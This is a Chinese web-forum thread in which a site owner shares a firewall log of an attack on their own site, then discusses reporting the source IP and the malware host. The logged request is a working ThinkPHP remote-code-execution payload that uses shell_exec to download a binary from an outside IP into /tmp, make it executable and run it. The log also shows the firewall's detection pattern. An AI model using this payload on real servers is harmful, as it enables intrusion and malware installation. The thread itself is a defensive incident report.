找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 44|回复: 4

纪念下第一次被人攻击

[复制链接]

37

主题

152

回帖

439

积分

中级会员

积分
439
发表于 2019-2-4 07:15:43 | 显示全部楼层 |阅读模式
用户IP        195.231.2.25
类型        GET        过滤器        args
URI地址
/public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp/%20;wget%20http://168.235.82.199/MavDDzxY/maddy.x86%20;chmod%20777%20*%20maddy.x86;%20%20./maddy.x86%20%3E%20efjins;chmod%20777%20efjins;./efjins%20thinkphp
User-Agent
python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.9.1.el6.x86_64
过滤规则
(invokefunction|call_user_func_array|\\think\\)
传入值
function:call_user_func_array
风险值
call_user_func_array

这ip就在渗透,有点舍不得加黑名单,Google出来好像是阿鲁巴的
回复

使用道具 举报

37

主题

152

回帖

439

积分

中级会员

积分
439
 楼主| 发表于 2019-2-4 07:26:39 | 显示全部楼层

xiaonv110 发表于 2019-2-4 07:26

机场???????

不是机场,自己的站
回复

使用道具 举报

37

主题

152

回帖

439

积分

中级会员

积分
439
 楼主| 发表于 2019-2-4 14:33:10 | 显示全部楼层
168.235.82.199
这个病毒下载的ip是ramnode的,ramnode也不管吗》?已经abuse了,还是要自己动手D?
回复

使用道具 举报

29

主题

452

回帖

1021

积分

金牌会员

积分
1021
发表于 2019-2-4 07:26:00 | 显示全部楼层
新建的站都会容易被攻击吧
回复

使用道具 举报

11

主题

131

回帖

329

积分

中级会员

积分
329
发表于 2019-2-4 14:35:23 | 显示全部楼层
大惊小怪系列
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|Discuz! X

GMT+8, 2025-5-24 20:14 , Processed in 0.022719 second(s), 4 queries , Gzip On, Redis On.

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表